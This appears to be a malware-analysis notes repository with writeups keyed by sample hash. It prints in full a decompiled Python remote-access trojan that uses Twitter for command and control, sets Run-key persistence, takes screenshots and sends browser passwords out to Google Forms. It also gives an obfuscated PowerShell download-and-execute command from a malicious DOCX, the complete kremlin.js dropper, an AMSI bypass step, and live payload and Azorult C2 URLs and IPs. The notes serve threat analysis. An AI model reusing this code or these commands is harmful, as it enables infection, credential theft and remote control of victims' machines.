├── 29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091.md
├── 30664f227788820c3f11911676a053655fb114cf6b0ca28a2a3fc9d9968a77ba.md
├── 3c18ac6d5fbcb89d733d0f281d68584717934c9628b6795ac89d97eb5d117c5b.md
├── 546bf4fc684c5d1e17b204a28c795a414124335b6ef7cbadf52ae8fbadcb2a4a.md
├── LICENSE
├── README.md
├── d2cd734c7d08fe8a5f1f65e319a3204f0c8b46ea224f1b90b3c8a6d0c6de586a.md
├── dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5.md
├── e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60.md
├── ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c.md
├── f8c94e76f4d756924bf929b32f85158bc81911ce4a606af67e37460405e0ad3f.md
├── gazavat_expiro_dga
    └── gazavat_dga_doms.txt
├── metastealer_dga
    ├── doms_0x113b.txt
    ├── doms_0x1234.txt
    ├── doms_0x2f73.txt
    ├── doms_0x4b9a.txt
    ├── doms_0x7b2f.txt
    ├── doms_0x9b2f.txt
    ├── doms_0xabc8.txt
    └── doms_0xc17a.txt
└── sunburst_dga
    ├── data.txt
    ├── decode.py
    ├── dump.txt
    └── readme.md


/29886dbbe81ead9e9999281e62ecf95d07acb24b9b0906b28beb65a84e894091.md:
--------------------------------------------------------------------------------
  1 | 7c487d8462567a826da95c799591f5fb
  2 | 
  3 | https://twitter.com/Rmy_Reserve/status/1217066627440635905
  4 | 
  5 | 
  6 | Downloads a vba doc file
  7 | 
  8 | ```
  9 |  2458  wget "https://drive.google.com/uc?export=download&id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl"
 10 | 
 11 | ```
 12 | 
 13 | ```
 14 | Dim myURL As String
 15 | myURL = "https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD"
 16 | 
 17 | Dim WinHttpReq As Object
 18 | Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
 19 | WinHttpReq.Open "GET", myURL, False
 20 | WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
 21 | WinHttpReq.send
 22 | 
 23 | ```
 24 | 
 25 | 
 26 | ```
 27 |  2466  wget "https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD"
 28 | ```
 29 | 
 30 | 1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD:
 31 | 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69
 32 | an image file with a base64 encoded EXE in it
 33 | 
 34 | Decoded EXE is an autoit downloader
 35 | 
 36 | b4a43b108989d1dde87e58f1fd6f81252ef6ae19d2a5e8cd76440135e0fd6366
 37 | 
 38 | 
 39 | downloads a python rat
 40 | 4228a5719a75be2d6658758fc063bd07c1774b44c10b00b958434421616f1548
 41 | 
 42 | 
 43 | Which also downloads webbrowserpassview and profiles the system
 44 | 
 45 | ```
 46 | wget "https://drive.google.com/uc?export=download&id=1Z2Y_QZXvza28ZqLUuzmWiSElvcySBf2o"
 47 | ```
 48 | 
 49 | Also downloads a hash
 50 | 
 51 | ```
 52 | wget "https://drive.google.com/uc?export=download&id=1BmzeSxclQMmxiD-8SjnyxXQolx-44cJh"
 53 | ```
 54 | 
 55 | and another image file
 56 | 
 57 | ```
 58 | get "https://drive.google.com/uc?export=download&id=1JRWUcux5uocl9gNZ3f8Ue--P1kLjZkQC"
 59 | 
 60 | ```
 61 | 
 62 | Which has a upx packed exe in it which unpacks to Nirsoft Nircmd used for screenshot
 63 | 
 64 | 
 65 | 
 66 | 
 67 | 
 68 | decompiled python rat after fixing final2 files python3 header
 69 | 
 70 | ```
 71 | from requests import post, get
 72 | from datetime import datetime
 73 | from os import path, environ, remove, startfile
 74 | from bs4 import BeautifulSoup
 75 | from time import sleep, gmtime, strftime
 76 | import subprocess, threading, winreg as wreg
 77 | from base64 import b64decode, b64encode
 78 | from random import choice
 79 | import sys
 80 | tw = '@jhone87438316'
 81 | ss_id = '1FAIpQLSfCNzwaz4WoFfnvNZS99CeGMp86H3hNoHCtwira8uW_b3vYTQ'
 82 | ss_id_entry = 'entry.62933741'
 83 | out_id = '1FAIpQLSfwDQBvgZZfMu1LKviMuCdaWfYato07ac5tS5IZJS1XZ6BEbw'
 84 | out_user_entry = 'entry.1539892742'
 85 | out_result_entry = 'entry.1818065606'
 86 | fk = '1BmzeSxclQMmxiD-8SjnyxXQolx-44cJh'
 87 | t1 = '1JRWUcux5uocl9gNZ3f8Ue--P1kLjZkQC'
 88 | t2 = '1Z2Y_QZXvza28ZqLUuzmWiSElvcySBf2o'
 89 | ch = [
 90 |  'chrome', 'ccleaner', 'winrar', 'proc']
 91 | chimg = ['imag', 'pic', 'photo', 'cartoon']
 92 | u1 = choice(ch) + '.exe'
 93 | img = choice(chimg) + '.jpg'
 94 | txt = choice(ch) + '.txt'
 95 | 
 96 | def xvfdgytrynmsdfdszxc(command):
 97 |     DEVNULL = subprocess.DEVNULL
 98 |     out = str(subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL).decode()).replace('\r\r\n', '')
 99 |     return out
100 | 
101 | 
102 | content1 = xvfdgytrynmsdfdszxc('wmic diskdrive get SerialNumber /format:list').replace(' ', '').replace('SerialNumber=', '')
103 | 
104 | def dvnhhqertbvvfkl(file, id):
105 |     if not path.exists(file):
106 |         print('log no exist *')
107 |         with open(file, 'w+') as (f):
108 |             f.write(id)
109 |             f.flush()
110 |             f.close()
111 |         xvfdgytrynmsdfdszxc('attrib +h "%appdata%\\temp3.tmp"')
112 |     else:
113 |         print('log  exist *')
114 |         remove(file)
115 |         with open(file, 'w+') as (f):
116 |             f.write(id)
117 |             f.flush()
118 |             f.close()
119 |         xvfdgytrynmsdfdszxc('attrib +h "%appdata%\\temp3.tmp"')
120 | 
121 | 
122 | def dghtytyplqwesbnz(jpg_file_path, out_file):
123 |     f = open(jpg_file_path, 'rb')
124 |     jpgdata = f.read()
125 |     f.close()
126 |     b64 = str(jpgdata).split('****')[1].replace("'", '')
127 |     bytes = b64decode(b64, validate=True)
128 |     f = open(out_file, 'wb')
129 |     f.write(bytes)
130 |     f.close()
131 |     return out_file
132 | 
133 | 
134 | def qtypasadfzxc(id):
135 |     p1 = environ['appdata'] + '\\' + choice(chimg) + '.jpg'
136 |     url = 'https://drive.google.com/uc?export=qtypasadfzxcload&id=' + id
137 |     headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',  'Upgrade-Insecure-Requests':'1',  'DNT':'1',  'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  'Accept-Language':'en-US,en;q=0.5',  'Accept-Encoding':'gzip, deflate'}
138 |     r = get(url, headers=headers)
139 |     with open(p1, 'wb') as (f):
140 |         f.write(r.content)
141 |         f.close()
142 |     out = environ['appdata'] + '\\' + u1
143 |     d1 = dghtytyplqwesbnz(p1, out)
144 |     delcmd = 'del ' + p1
145 |     xvfdgytrynmsdfdszxc(delcmd)
146 | 
147 | 
148 | def dzdfdytyuio(userid, fileid):
149 |     p1 = environ['USERPROFILE'] + '\\qtypasadfzxcloads\\' + choice(chimg) + '.jpg'
150 |     p2 = environ['USERPROFILE'] + '\\qtypasadfzxcloads\\' + choice(ch) + '.exe'
151 |     url = 'https://drive.google.com/uc?export=qtypasadfzxcload&id=' + fileid
152 |     headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',  'Upgrade-Insecure-Requests':'1',  'DNT':'1',  'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  'Accept-Language':'en-US,en;q=0.5',  'Accept-Encoding':'gzip, deflate'}
153 |     r = get(url, headers=headers)
154 |     with open(p1, 'wb') as (f):
155 |         f.write(r.content)
156 |         f.flush()
157 |         f.close()
158 |     dvnhhqertbvvfkl(environ['appdata'] + '\\temp3.tmp', fileid)
159 |     d1 = dghtytyplqwesbnz(p1, p2)
160 |     remove(p1)
161 |     startfile(p2)
162 |     gfdggvbdsopqq(out_id, out_user_entry, userid, out_result_entry, d1)
163 | 
164 | 
165 | def fdvdgfyfytuiowe():
166 |     contents = ''
167 |     mylist = []
168 |     key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, 'Keyboard Layout\\Preload', 0, wreg.KEY_ALL_ACCESS)
169 |     try:
170 |         for i in range(4):
171 |             n, v, t = wreg.EnumValue(key, i)
172 |             mylist.append(v[4:])
173 | 
174 |     except EnvironmentError:
175 |         pass
176 | 
177 |     key.Close()
178 |     if any(x == '0401' for x in mylist) or any(x == '0801' for x in mylist) or any(x == '0c01' for x in mylist) or any(x == '1001' for x in mylist) or any(x == '1401' for x in mylist) or any(x == '1801' for x in mylist) or any(x == '1c01' for x in mylist) or any(x == '2001' for x in mylist) or any(x == '2401' for x in mylist) or any(x == '2801' for x in mylist) or any(x == '3801' for x in mylist) or any(x == '3401' for x in mylist) or any(x == '3c01' for x in mylist) or any(x == '3001' for x in mylist):
179 |         pass
180 |     else:
181 |         os._exit(0)
182 |     if not path.exists(environ['appdata'] + '\\temp1.tmp'):
183 |         serial = xvfdgytrynmsdfdszxc('wmic diskdrive get SerialNumber /format:list').replace(' ', '').replace('SerialNumber=', '')
184 |         if serial == '':
185 |             os._exit(0)
186 |         ver = xvfdgytrynmsdfdszxc('wmic  os get Caption /Format:List & wmic computersystem get Manufacturer,Model,domain , Name /Format:List & WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List').replace('Caption=', '').replace('Model', '').replace('Domain', '').replace('Name', '').replace(' ', '=').replace('Manufacturer', '').replace('\n\n\n', '').replace('displayName', '').split('=')
187 |         v = ''
188 |         for i in ver:
189 |             v += i[:4]
190 | 
191 |         sss = serial + v
192 |         with open(environ['appdata'] + '\\temp1.tmp', 'w+') as (f):
193 |             f.write(sss)
194 |             f.flush()
195 |             f.close()
196 |         xvfdgytrynmsdfdszxc('attrib +h "%appdata%\\temp1.tmp"')
197 |         with open(environ['appdata'] + '\\temp1.tmp', 'r') as (f):
198 |             contents = f.read()
199 |             f.close()
200 |     else:
201 |         with open(environ['appdata'] + '\\temp1.tmp', 'r') as (f):
202 |             contents = f.read()
203 |             f.close()
204 |     return contents
205 | 
206 | 
207 | def bgfhfghggrydss(id='dfffdfdgrrhh'):
208 |     now = datetime.now()
209 |     dvnhhqertbvvfkl(environ['appdata'] + '\\temp3.tmp', id)
210 |     qtypasadfzxc(t1)
211 |     sleep(2)
212 |     cmd = 'start %appdata%\\' + u1 + ' savescreenshot %appdata%\\' + img
213 |     print(cmd)
214 |     xvfdgytrynmsdfdszxc(cmd)
215 |     with open(environ['appdata'] + '\\' + img, 'rb') as (file):
216 |         url = 'https://api.imgbb.com/1/upload'
217 |         payload = {'key':ddrtrtrtrtetecvcdfdfdee(fk), 
218 |          'image':b64encode(file.read()), 
219 |          'name':content1[:7] + now.strftime('%H:%M')}
220 |         res = post(url, payload)
221 |     delcmd = 'del %appdata%\\' + u1 + '& del %appdata%\\' + img
222 |     xvfdgytrynmsdfdszxc(delcmd)
223 | 
224 | 
225 | def tyyinccdfdfdsygg(id='werrttyyggg'):
226 |     dvnhhqertbvvfkl(environ['appdata'] + '\\temp3.tmp', id)
227 |     qtypasadfzxc(t2)
228 |     cmd = 'start %appdata%\\' + u1 + '  /stext %appdata%\\' + txt
229 |     print(cmd)
230 |     xvfdgytrynmsdfdszxc(cmd)
231 |     sleep(2)
232 |     dd = ''
233 |     with open(environ['appdata'] + '\\' + txt, 'r') as (file):
234 |         dd = file.read()
235 |         file.close()
236 |     serial = fdvdgfyfytuiowe()[:10]
237 |     gfdggvbdsopqq(out_id, out_user_entry, serial, out_result_entry, dd.replace('\x00', ''))
238 |     delcmd = 'del %appdata%\\' + u1 + '& del %appdata%\\' + txt
239 |     xvfdgytrynmsdfdszxc(delcmd)
240 | 
241 | 
242 | def mjhd(name=tw):
243 |     if name.startswith('@'):
244 |         name = name[1:]
245 |     url = 'https://twitter.com/' + name
246 |     headers = {'User-Agent': 'Chrome/28.0.1500.52'}
247 |     r = get(url, headers=headers)
248 |     data = r.text
249 |     print(r.status_code)
250 |     soup = BeautifulSoup(data, 'html.parser')
251 |     title = soup.title.text
252 |     bio = soup.find('p', {'class': 'ProfileHeaderCard-bio'}).text
253 |     tweets = soup.findAll('div', {'class': 'tweet'})
254 |     m1 = tweets[:1][0].find('p').text
255 |     print(m1)
256 |     return m1
257 | 
258 | 
259 | def fdsrttrt():
260 |     user_agent = {'Referer':'https://api.ipify.org', 
261 |      'User-Agent':'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
262 |     ip = get('https://api.ipify.org', headers=user_agent).text
263 |     return ip
264 | 
265 | 
266 | def rthgfhfgdtr(url='http://www.google.com/', timeout=5):
267 |     try:
268 |         req = get(url, timeout=timeout)
269 |         req.raise_for_status()
270 |         return True
271 |     except requests.HTTPError as e:
272 |         try:
273 |             return False
274 |         finally:
275 |             e = None
276 |             del e
277 | 
278 |     except requests.ConnectionError:
279 |         return False
280 | 
281 |     return False
282 | 
283 | 
284 | def fgdgdghnccvbbqw(id, entry, string):
285 |     url = 'https://docs.google.com/forms/d/e/' + id + '/formResponse'
286 |     enc = b64encode(bytes(string, 'utf8')).decode()
287 |     form_data = {entry: enc}
288 |     user_agent = {'Referer':'https://docs.google.com/forms/d/e/' + id + '/viewform',  'User-Agent':'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
289 |     r = post(url, data=form_data, headers=user_agent)
290 |     if r.status_code == 200:
291 |         return True
292 |     else:
293 |         return False
294 | 
295 | 
296 | def gfdggvbdsopqq(id, entry1, string1, entry2, string2):
297 |     url = 'https://docs.google.com/forms/d/e/' + id + '/formResponse'
298 |     enc1 = b64encode(bytes(string1, 'utf8')).decode()
299 |     enc2 = b64encode(bytes(string2, 'utf8')).decode()
300 |     form_data = {entry1: enc1, entry2: enc2}
301 |     user_agent = {'Referer':'https://docs.google.com/forms/d/e/' + id + '/viewform',  'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'}
302 |     r = post(url, data=form_data, headers=user_agent)
303 |     if r.status_code == 200:
304 |         return True
305 |     else:
306 |         return False
307 | 
308 | 
309 | def ddrtrtrtrtetecvcdfdfdee(id):
310 |     url = 'https://drive.google.com/uc?export=qtypasadfzxcload&id=' + id
311 |     headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36',  'Upgrade-Insecure-Requests':'1',  'DNT':'1',  'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  'Accept-Language':'en-US,en;q=0.5',  'Accept-Encoding':'gzip, deflate'}
312 |     r = get(url, headers=headers)
313 |     return b64decode(r.content).decode()
314 | 
315 | 
316 | def ffgrtrdffdfcvcdfdfdef():
317 |     pt = sys.argv[0]
318 |     destination = environ['USERPROFILE'] + '\\Documents\\' + sys.argv[0].split('\\')[(-1)]
319 |     try:
320 |         key0 = wreg.OpenKey(wreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, wreg.KEY_ALL_ACCESS)
321 |         tt = wreg.QueryValueEx(key0, 'ChromeUpdater')
322 |         key0.Close()
323 |         if tt[0].replace('\\\\', '\\') != destination:
324 |             key1 = wreg.OpenKey(wreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, wreg.KEY_ALL_ACCESS)
325 |             wreg.SetValueEx(key1, 'ChromeUpdater', 0, wreg.REG_SZ, destination)
326 |             key1.Close()
327 |     except FileNotFoundError:
328 |         key2 = wreg.OpenKey(wreg.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, wreg.KEY_ALL_ACCESS)
329 |         wreg.SetValueEx(key2, 'ChromeUpdater', 0, wreg.REG_SZ, destination)
330 |         key2.Close()
331 | 
332 | 
333 | def dfdfppoqwwdfdef(txt):
334 |     temp = tempfile.TemporaryFile()
335 |     temp.write(bytes(txt, 'utf8'))
336 |     temp.seek(0)
337 |     return temp.read().decode()
338 | 
339 | 
340 | def dfhbbnnnffsse(id):
341 |     contents = ''
342 |     if not path.exists(environ['appdata'] + '\\temp3.tmp'):
343 |         print('log not exist')
344 |         contents = ''
345 |     else:
346 |         f = open(environ['appdata'] + '\\temp3.tmp', 'r')
347 |         contents = f.read()
348 |         f.close()
349 |     if id != contents or contents == '':
350 |         return True
351 |     else:
352 |         return False
353 | 
354 | 
355 | def dfdereerexccb(tweet):
356 |     if '--' in tweet and len(tweet.split('--')) >= 2:
357 |         ssid = tweet.split('--')[0]
358 |         id = tweet.split('--')[1]
359 |         cmd = tweet.split('--')[2]
360 |         if ssid in fdvdgfyfytuiowe() or ssid == 'all':
361 |             if dfhbbnnnffsse(id):
362 |                 if cmd == 'dd':
363 |                     dzdfdytyuio(ssid, id)
364 |                 if cmd == 'cc':
365 |                     bgfhfghggrydss(id)
366 |                 if cmd == 'pp':
367 |                     tyyinccdfdfdsygg(id)
368 |     if cmd == 'md':
369 |         content2 = ddrtrtrtrtetecvcdfdfdee(id)
370 |         dd = xvfdgytrynmsdfdszxc(content2)
371 |         dvnhhqertbvvfkl(environ['appdata'] + '\\temp3.tmp', id)
372 |         gfdggvbdsopqq(out_id, out_user_entry, ssid, out_result_entry, dd)
373 | 
374 | 
375 | def dfdftretretnmnddeeaax():
376 |     while True:
377 |         try:
378 |             while 1:
379 |                 if rthgfhfgdtr():
380 |                     sleep(10)
381 |                     if not path.exists(environ['appdata'] + '\\temp2.tmp'):
382 |                         f = open(environ['appdata'] + '\\temp2.tmp', 'w+')
383 |                         xvfdgytrynmsdfdszxc('attrib +h "%appdata%\\temp2.tmp"')
384 |                         i = fdvdgfyfytuiowe() + fdsrttrt().replace('.', 'p')
385 |                         sleep(1)
386 |                         status = fgdgdghnccvbbqw(ss_id, ss_id_entry, i)
387 |                         sleep(1)
388 |                         f.write(str(status))
389 |                         f.close()
390 |                     tweet = mjhd()
391 |                     dfdereerexccb(tweet)
392 | 
393 |         except:
394 |             pass
395 |         else:
396 |             print('')
397 | 
398 | 
399 | def main():
400 |     t1 = threading.Thread(target=fdvdgfyfytuiowe)
401 |     t1.start()
402 |     t = threading.Thread(target=ffgrtrdffdfcvcdfdfdef)
403 |     t.start()
404 |     t2 = threading.Thread(target=dfdftretretnmnddeeaax)
405 |     t2.start()
406 |     t1.join()
407 |     t.join()
408 |     t2.join()
409 | 
410 | 
411 | if __name__ == '__main__':
412 |     main()
413 | 
414 | ```
415 | 


--------------------------------------------------------------------------------
/30664f227788820c3f11911676a053655fb114cf6b0ca28a2a3fc9d9968a77ba.md:
--------------------------------------------------------------------------------
  1 | 13075f41e5390842dfafd6dcfce541ba   -  Formularz NDA.docx
  2 | 
  3 | https://app.any.run/tasks/dd07fca0-f98a-40a1-9e96-8a945907b990/
  4 | 
  5 | 
  6 | Annex has ole objects inside that run this
  7 | 
  8 | ```
  9 | cmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run("""Powershell '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://office-cleaner-commander.com/kremlin.js'',''$env:APPDATA''+''Annex.js'')'|IEX; start-process('$env:APPDATA' +'Annex.js')""",0)
 10 | 
 11 | ```
 12 | 
 13 | ```
 14 | office-cleaner-commander.com  - 185.98.87.210
 15 | 
 16 | ```
 17 | 
 18 | kremlin.js
 19 | 
 20 | ```
 21 | 
 22 | 
 23 | f="pod|'' nioj- i4uh34uh4uywrhy34higjho$]][rahc[;)77,421,93,93,23,0Kremlin,501,Kremlin1,601,54,23,5Kremlin,4Kremlin,79,401,76,501,501,99,5Kremlin,79,63,23,16,301,0Kremlin,501,4Kremlin,6Kremlin,38,501,501,99,5Kremlin,79,63,95,521,43,59,63,021,84,43,39,101,6Kremlin,121,89,19,39,4Kremlin,79,401,99,19,321,23,6Kremlin,99,101,601,89,97,54,401,99,79,96,4Kremlin,Kremlin1,07,421,23,93,54,93,23,6Kremlin,501,801,2Kremlin,5Kremlin,54,23,121,6Kremlin,63,23,16,5Kremlin,4Kremlin,79,401,76,501,501,99,5Kremlin,79,63,95,6Kremlin,021,101,48,101,5Kremlin,0Kremlin,Kremlin1,2Kremlin,5Kremlin,101,4Kremlin,64,6Kremlin,63,16,121,6Kremlin,63,95,14,04,001,0Kremlin,101,5Kremlin,64,6Kremlin,63,95,14,101,5Kremlin,801,79,201,63,44,93,301,2Kremlin,601,64,701,99,79,6Kremlin,6Kremlin,56,74,901,Kremlin1,99,64,4Kremlin,101,001,0Kremlin,79,901,901,Kremlin1,99,54,4Kremlin,101,0Kremlin,79,101,801,99,54,101,99,501,201,201,Kremlin1,74,74,85,2Kremlin,6Kremlin,6Kremlin,401,93,44,93,48,96,17,93,04,0Kremlin,101,2Kremlin,Kremlin1,64,6Kremlin,63,95,08,48,48,27,67,77,88,64,6Kremlin,201,Kremlin1,5Kremlin,Kremlin1,4Kremlin,99,501,77,23,901,Kremlin1,76,54,23,6Kremlin,99,101,601,89,97,54,9Kremlin,101,87,23,16,6Kremlin,63,95,05"
 24 | f=f+",05,2Kremlin,63,23,16,23,801,Kremlin1,99,Kremlin1,6Kremlin,Kremlin1,4Kremlin,08,121,6Kremlin,501,4Kremlin,7Kremlin,99,101,38,85,85,39,4Kremlin,101,301,79,0Kremlin,79,77,6Kremlin,0Kremlin,501,Kremlin1,08,101,99,501,8Kremlin,4Kremlin,101,38,64,6Kremlin,101,87,64,901,101,6Kremlin,5Kremlin,121,38,19,95,14,05,55,84,15,23,44,39,101,2Kremlin,121,48,801,Kremlin1,99,Kremlin1,6Kremlin,Kremlin1,4Kremlin,08,121,6Kremlin,501,4Kremlin,7Kremlin,99,101,38,64,6Kremlin,101,87,64,901,101,6Kremlin,5Kremlin,121,38,19,04,6Kremlin,99,101,601,89,97,Kremlin1,48,85,85,39,901,7Kremlin,0Kremlin,96,19,23,16,23,05,05,2Kremlin,63,95,14,301,0Kremlin,501,2Kremlin,63,04,23,801,501,6Kremlin,0Kremlin,7Kremlin,23,521,6Kremlin,101,501,7Kremlin,18,54,23,94,23,6Kremlin,0Kremlin,7Kremlin,Kremlin1,99,54,23,901,Kremlin1,99,64,101,801,301,Kremlin1,Kremlin1,301,23,2Kremlin,901,Kremlin1,99,54,23,0Kremlin,Kremlin1,501,6Kremlin,99,101,0Kremlin,0Kremlin,Kremlin1,99,54,6Kremlin,5Kremlin,101,6Kremlin,23,16,23,301,0Kremlin,501,2Kremlin,63,321,23,Kremlin1,001,95,101,0Kremlin,Kremlin1,89,48,63,23,77,23,801,79,5Kremlin,95,14,93,37,93,44,93,24,93,04,101,99,79,801,2Kremlin,101,4Kremlin,64,93,88,96,24,93,16,101,0Kremlin,Kremlin1,89,48,63(@=i4uh34uh4uywrhy34higjho$;dc$ pod las;''niOj-]52,62,4[cePsmOc:vne$=dc$"
 25 | 
 26 | 
 27 | 
 28 | AT("Powershell " + REVERSE(replaceAll(f)))
 29 | 
 30 | 
 31 | var CurrentDirectory =WScript.ScriptFullName
 32 | 
 33 | AT("Powershell " +"Remove-Item  '" + CurrentDirectory+"'")
 34 | 
 35 | 
 36 | function AT(strCommand){
 37 | var strComputer = ".";
 38 |    var strCommand = strCommand;
 39 |    var objWMIService = GetObject("winmgmts:\\\\" + strComputer +
 40 | "\\root\\CIMV2");
 41 |    var objProcess = objWMIService.Get("Win32_Process");
 42 |    var objInParam =
 43 | objProcess.Methods_("Create").inParameters.SpawnInstance_();
 44 |    var objStartup =
 45 | objWMIService.Get("Win32_ProcessStartup").SpawnInstance_();
 46 |    objStartup.ShowWindow = 0;
 47 |    objInParam.CommandLine = strCommand;
 48 |    objInParam.ProcessStartupInformation = objStartup;
 49 |       var objOutParams = objWMIService.ExecMethod( "Win32_Process",
 50 | "Create", objInParam );
 51 | }
 52 | 
 53 | function replaceAll(str) {
 54 |     return str.split("Kremlin").join("11");
 55 | }
 56 | 
 57 | function REVERSE(str) {
 58 |     return str.split("").reverse().join("");
 59 | }
 60 | 
 61 | 
 62 | 
 63 | ```
 64 | 
 65 | 
 66 | decoded:
 67 | 
 68 | ```
 69 | '$Tbone=\'*EX\'.replace(\'*\',\'I\');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$t= New-Object -Com Microsoft.XMLHTTP;$t.open(\'GET\',\'http://office-cleaner-commander.com/Attack.jpg\',$false);$t.send();$ty=$t.responseText;$asciiChars= $ty -split \'-\' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join \'\'|M'
 70 | 
 71 | 
 72 | ```
 73 | 
 74 | This loads Attack.jpg which performs AMSI bypass with an onboard .NET DLL that is gzip compressed
 75 | 
 76 | ```
 77 | byte[]]$deblindB = UNpaC0k1147555 $blindB
 78 | 
 79 | $blind=[System.Reflection.Assembly]::Load($deblindB)
 80 | [Amsi]::Bypass()
 81 | 
 82 | [byte[]]$decompressedByteArray = UNpaC0k1147555  $MNB
 83 | 
 84 | ```
 85 | 
 86 | At the end loading an onboard EXE file using a function from the .NET DLL
 87 | 
 88 | ```
 89 | $t=[System.Reflection.Assembly]::Load($decompressedByteArray)
 90 | [rOnAlDo]::ChRiS('control.exe',$MNB2)
 91 | ```
 92 | 
 93 | The exe is Azorult:
 94 | https://app.any.run/tasks/cdc6b198-6c78-46eb-acba-d859ddf8cd5e
 95 | 
 96 | ```
 97 | hxxp://fssshipping[.]com/azo/Panel/index.php
 98 | ```
 99 | 
100 | ```
101 | fssshipping.com  -  85.192.35.51
102 | 
103 | ```
104 | 
105 | 
106 | 


--------------------------------------------------------------------------------
/3c18ac6d5fbcb89d733d0f281d68584717934c9628b6795ac89d97eb5d117c5b.md:
--------------------------------------------------------------------------------
 1 | 3c18ac6d5fbcb89d733d0f281d68584717934c9628b6795ac89d97eb5d117c5b
 2 | 
 3 | Has some anti in the secondary layer
 4 | 
 5 | including a FS[0xc0] check into a heavens gate + many normal anti checks and tactics
 6 | Trampolines DbgUiRemoteBreakin and DbgBreakPoint 
 7 | 
 8 | 
 9 | DbgBreakPoint becomes
10 | Nop
11 | Ret
12 | 
13 | DbgUiRemoteBreakin becomes
14 | 
15 | push 0
16 | mov eax, 2
17 | call eax
18 | retn 4
19 | 
20 | 
21 | 3rd layer downloads:
22 | 
23 | ```
24 | https://drive.google.com/uc?export=download&id=1aK0VvyQgvNqOCF3dahuSQIcUefrHRqZ3
25 | ```
26 | 
27 | 
28 | XOR encoded file
29 | ```
30 | 00000000: 6136 6561 3931 6165 3062 6466 6336 3066  a6ea91ae0bdfc60f
31 | 00000010: 6131 3434 3738 6630 3066 3831 3362 3138  a14478f00f813b18
32 | 00000020: 3838 3464 6262 3236 6564 6162 3861 6664  884dbb26edab8afd
33 | 00000030: 3533 3363 6166 3933 3237 6465 3564 3936  533caf9327de5d96
34 | 00000040: faca 40cc 1f2e 3c13 8ad8 b466 f3e7 7d0a  ..@...<....f..}.
35 | 00000050: 9865 97ff 4102 bf45 f3ad 37dc 32ec 0080  .e..A..E..7.2...
36 | 00000060: 0139 1b75 66d6 42bb 9481 ba0e 57c0 84b2  .9.uf.B.....W...
37 | 00000070: 270d 9ea7 48ab c5ed b955 8284 7c94 0728  '...H....U..|..(
38 | 00000080: 42fe 9b13 6dcb 84a9 fe91 04fb 9048 9a33  B...m........H.3
39 | 00000090: 18c5 8420 e060 77e4 a193 a88a e297 3fbe  ... .`w.......?.
40 | 000000a0: c3b0 b2a9 3c5c 497d aeb1 da46 4857 2e2a  ....<\I}...FHW.*
41 | 000000b0: 4d0a f39a 6f0f b24f 97ad 37dc 32ec 0080  M...o..O..7.2...
42 | 000000c0: 6545 9c8c 46cb ab11 b49c 53a4 77dd 6d18  eE..F.....S.w.m.
43 | 000000d0: 4a33 6a0d 69b6 2c47 ca6b 722e 5e88 ee82  J3j.i.,G.kr.^...
44 | 000000e0: 6cfc c8b7 4262 64ce 8428 e01d 7c74 27f1  l...Bbd..(..|t'.
45 | 000000f0: d2b7 43fa b612 f93c 08fc 6b43 a8e4 b87b  ..C....<..kC...{
46 | 00000100: 7f92 3d66 3833 d5b9 ccda 4ecc 2305 94a0  ..=f83....N.#...
47 | 00000110: 0078 7f55 2f1e 56ef 2bb6 d876 13f1 e92a  .x.U/.V.+..v...*
48 | 00000120: c93b f9df 58cb ab11 c6e8 d966 77dd 6d18  .;..X......fw.m.
49 | 00000130: 270d 9ea7 48ab c5ed b955 8284 7c95 0728  '...H....U..|..(
50 | 00000140: 1ca4 211d 217e 8864 9e3f 80ea 5d69 ce5b  ..!.!~.d.?..]i.[
51 | 00000150: 71b6 a450 720f 1e97 cbff 8ee9 83c9 50d1  q..Pr.........P.
